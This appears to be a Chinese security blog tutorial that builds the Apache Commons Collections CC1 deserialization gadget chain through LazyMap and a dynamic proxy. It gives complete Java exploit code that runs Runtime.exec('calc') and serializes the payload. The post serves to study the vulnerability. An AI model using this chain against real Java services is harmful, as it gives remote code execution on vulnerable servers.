cc1链(LazyMap)

最新推荐文章于 2024-08-27 08:35:16 发布
最新推荐文章于 2024-08-27 08:35:16 发布
阅读量558 收藏
点赞数
分类专栏: java代码审计 文章标签: 开发语言 java 代码复审 maven
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45766062/article/details/126415997
版权

cc1链(LazyMap)

接上次分析,在上一次分析中我们已经构造了一条完整的利用链:

package sec;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;


public class Test {
    public static void main(String[] args) throws Exception {
        //Runtime.getRuntime().exec("open /System/Applications/Calculator.app");

        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class,Class[].class},
                        new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> map = new HashMap<>();
        map.put("value","value");
        Map<Object,Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor con=c.getDeclaredConstructor(Class.class,Map.class);
        con.setAccessible(true);
        Object obj=con.newInstance(java.lang.annotation.Retention.class,decorate);

        serialize(obj);
        //unserialize();

    }
    public static void serialize(Object obj) throws Exception {
        ObjectOutputStream outputStream = new ObjectOutputStream( new FileOutputStream("ser.bin"));
        outputStream.writeObject(obj);
        outputStream.close();
    }

    public static void unserialize() throws  Exception{
        ObjectInputStream inputStream = new ObjectInputStream( new FileInputStream("ser.bin"));
        Object obj = inputStream.readObject();

    }
}

继续分析,其实可以发现在LazyMap中的get方法也调用了transform函数:

  //-----------------------------------------------------------------------
    public Object get(Object key) {
        // create value for key if key is not currently in the map
        if (map.containsKey(key) == false) {
            Object value = factory.transform(key);
            map.put(key, value);
            return value;
        }
        return map.get(key);
    }

    // no need to wrap keySet, entrySet or values as they are views of
    // existing map entries - you can't do a map-style get on them.

并且这里的factory的值可以通过构造方法控制:

 /**
     * Constructor that wraps (not copies).
     * 
     * @param map  the map to decorate, must not be null
     * @param factory  the factory to use, must not be null
     * @throws IllegalArgumentException if map or factory is null
     */
    protected LazyMap(Map map, Factory factory) {
        super(map);
        if (factory == null) {
            throw new IllegalArgumentException("Factory must not be null");
        }
        this.factory = FactoryTransformer.getInstance(factory);
    }

虽然这里的构造方法是一个保护方法,但是这里还有一个静态方法decorate,通过这个方法我们可以调用构造方法:

   /**
     * Factory method to create a lazily instantiated map.
     * 
     * @param map  the map to decorate, must not be null
     * @param factory  the factory to use, must not be null
     * @throws IllegalArgumentException if map or factory is null
     */
    public static Map decorate(Map map, Transformer factory) {
        return new LazyMap(map, factory);
    }

所以这里我们可以修改一下我们之前的链子了:

public class Test {
    public static void main(String[] args) throws Exception {
        //Runtime.getRuntime().exec("open /System/Applications/Calculator.app");

        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class,Class[].class},
                        new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value","value");
        Map<Object,Object> decorate = LazyMap.decorate(map, chainedTransformer);
        decorate.get("");
    }
    
}

接下来看看get方法在哪里被调用了,这里可以看到在AnnotationInvocationHandler类中的readObject和invoke中被调用了,但是在readobject方法中memberTypes值不可控:
在这里插入图片描述
在invoke方法中,可以看到memberValues的值可控:

 AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
        this.type = type;
        this.memberValues = memberValues;
    }

    public Object invoke(Object proxy, Method method, Object[] args) {
        String member = method.getName();
        Class<?>[] paramTypes = method.getParameterTypes();

        // Handle Object and Annotation methods
        if (member.equals("equals") && paramTypes.length == 1 &&
            paramTypes[0] == Object.class)
            return equalsImpl(args[0]);
        assert paramTypes.length == 0;
        if (member.equals("toString"))
            return toStringImpl();
        if (member.equals("hashCode"))
            return hashCodeImpl();
        if (member.equals("annotationType"))
            return type;

        // Handle annotation member accessors
        Object result = memberValues.get(member);

        if (result == null)
            throw new IncompleteAnnotationException(type, member);

        if (result instanceof ExceptionProxy)
            throw ((ExceptionProxy) result).generateException();

        if (result.getClass().isArray() && Array.getLength(result) != 0)
            result = cloneArray(result);

        return result;
    }

所以这里我们需要利用到jdk动态代理的方法,因为使用jdk动态代理时会触发invoke方法,所以构造的payload如下:

public class Test {
    public static void main(String[] args) throws Exception {
        //Runtime.getRuntime().exec("open /System/Applications/Calculator.app");

        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class,Class[].class},
                        new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value","value");
        Map<Object,Object> decorate = LazyMap.decorate(map, chainedTransformer);
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor con=c.getDeclaredConstructor(Class.class,Map.class);
        con.setAccessible(true);
        InvocationHandler annotationInvocationHandler=(InvocationHandler)con.newInstance(Target.class,decorate);
        Map  proxymap=(Map)Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},annotationInvocationHandler);
        proxymap.entrySet();
    }
}

到这里我们只差最后一步就是找到一个重写的readObject来进行反序列化触发这个payload,还是在AnnotationInvocationHandler类中,在readObject中执行了:memberValues.entrySet(),所以完整的payload如下:

package sec;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;


public class Test {
    public static void main(String[] args) throws Exception {
        //Runtime.getRuntime().exec("open /System/Applications/Calculator.app");

        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class,Class[].class},
                        new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> map = new HashMap<>();
        map.put("value","value");
        Map<Object,Object> decorate = LazyMap.decorate(map, chainedTransformer);
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor con=c.getDeclaredConstructor(Class.class,Map.class);
        con.setAccessible(true);
        InvocationHandler annotationInvocationHandler=(InvocationHandler)con.newInstance(Target.class,decorate);
        Map  proxymap=(Map)Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},annotationInvocationHandler);
        Object obj=con.newInstance(Target.class,proxymap);
        serialize(obj);
        //unserialize();

    }
    public static void serialize(Object obj) throws Exception {
        ObjectOutputStream outputStream = new ObjectOutputStream( new FileOutputStream("ser.bin"));
        outputStream.writeObject(obj);
        outputStream.close();
    }

    public static void unserialize() throws  Exception{
        ObjectInputStream inputStream = new ObjectInputStream( new FileInputStream("ser.bin"));
        Object obj = inputStream.readObject();

    }
}
KKKKKento
关注
专栏目录
cc2530 uart1接收数据
09-18
cc2530 uart1串口初始化,并且通过串口中断接收,cc2530 uart1串口初始化,并且通过串口中断接收
java代码审计之CC1(一)
st3pby的博客
02-20 3886
InvokerTransformerCC1的漏洞点位于InvokerTransformer.class中反射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
CC1(LazyMap版)
..
10-14 667
前面我们介绍了TransformedMap版的CC1, 但是在ysoserial中用的是LazyMap,其实都差不多,下面开始分析一下,下面重在分析,如何找的就不说了(也不会)。如果文章有错误,欢迎斧正。
java反序列化——CC1
最新发布
DamnVanish的博客
08-27 1202
完整的子追踪起来还是挺复杂的,里面很多地方也都只是浅尝而止,基础还是不牢固反射机制还学的不太明白。 等多看几条子就老实了。。。
Java反序列化-(LazyMap)CC1与CC6
永远都没有了
04-15 787
CC6CC1
[java安全]CommonsCollections1(LazyMap)
leekos的博客,分享web安全相关知识~
07-16 2636
前面我们学习了cc1使用构造,但是ysoserial使用的是LazyMap进行构造的,相对复杂一点LazyMap和都是在模块中,我们想要测试首先需要创建maven项目,然后导入坐标
Java安全 CC1分析(Lazymap类)
Elite的博客
02-11 2049
本文讲解了Java安全中如何使用LazyMap类来构造cc1,详细易懂,小白首选
HelloChartLineDemo-master_hellocharts_say1cc_android_
10-02
android柱形图开发,包括条形图,柱形图,饼图等
RTT_TI_CC26xx.zip
09-01
1. 环境配置:设置开发环境,包括安装TI的CCS(Code Composer Studio)集成开发环境,下载并安装RTT的源代码和相关工具。 2. 平台适配:修改RTT的启动代码,使其适应CC2642r1的硬件特性,如内存布局、中断服务...
jdk1.8.60,CC1复现
11-29
1)bin:包含了最主要的是编译器(javac.exe)2)include:Java 和 JVM 交互用的头文件3)lib:类库4)jre:Java 运行环境JDK 有三种类型。1)J2SE:Standard Edition,标准版,是我们通常用的一个版本,从 JDK 5.0 ...
CC2530定时器1的原理与编程.ppt
11-13
CC2530定时器1的原理与编程 CC2530定时器1是单片机CC2530上的一个重要组件,用于生成定时器信号,控制各种外围设备的工作状态。本资源将详细介绍CC2530定时器1的原理、编程方法以及应用场景。 一、CC2530定时器1的...
javacc1lazymap部分(源码分析学习笔记)
qq_62540010的博客
03-23 311
创建一个lazymap的动态代理,然后传入AnnotationInvocationHandler的变量里,当调用方法时(代理对象的方法),自动触发代理,进入AnnotationInvocationHandler的invoke方法从而触发lazy的get方法,然后就是ChainedTransformer了,与上一条一样,大体思路。
CC1-LazyMap利用-源码分析
yuan_boss的博客
08-15 254
这个其实和我上一篇文章的CC1大致思路是一样的,主要特殊就在于利用了动态代理中自动调用InvocationHandler对象的invoke方法,从而调用到我们可以利用的get()方法。
CC1补充-LazyMap
鸣蜩十四的博客
05-27 888
在我们上一篇中详细分析了CC1,但是在CC1中还有一条就是LazyMap
MultiMap,BidiMapLazyMap简述
永远相信美好的事情即将发生
03-15 613
Map 作为一种 key-value 格式的数据结构在我们的开发过程中经常用到。通过 Map 我们可以对数据数据检索实现接近 O(1) 的时间复杂度。 public static void main(String[] args){ // 创建一个 Map 对象 Map<Integer,String> map = new HashMap<>(12); // 往 map 中写入数据 map.put(1,"张三"); map.put(2,"李四"); map.put(3,"王五
Java反序列化:CC1 详解
Jay17的博客
10-06 1504
Java反序列化:CC1 详解
JavaSec 基础之 CC1
akdelt的博客
03-11 517
调用了 checkSetValue。而且它是 TransformedMap 的父类。
CC1分析与利用超详细
2301_79700060的博客
06-27 1065
主要的函数调用就是只是其中穿插了一些其他需要解决的问题。
CC2530定时器1实验教程及使用示例
资源摘要信息:"CC2530-T1.zip_cc2530 T1是一个包含基础实验的压缩包文件,其核心内容是CC2530微控制器中定时器1(Timer1)的使用例程。通过这个实验,可以观察到LED(发光二极管)的变化,从而直观地了解定时器的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值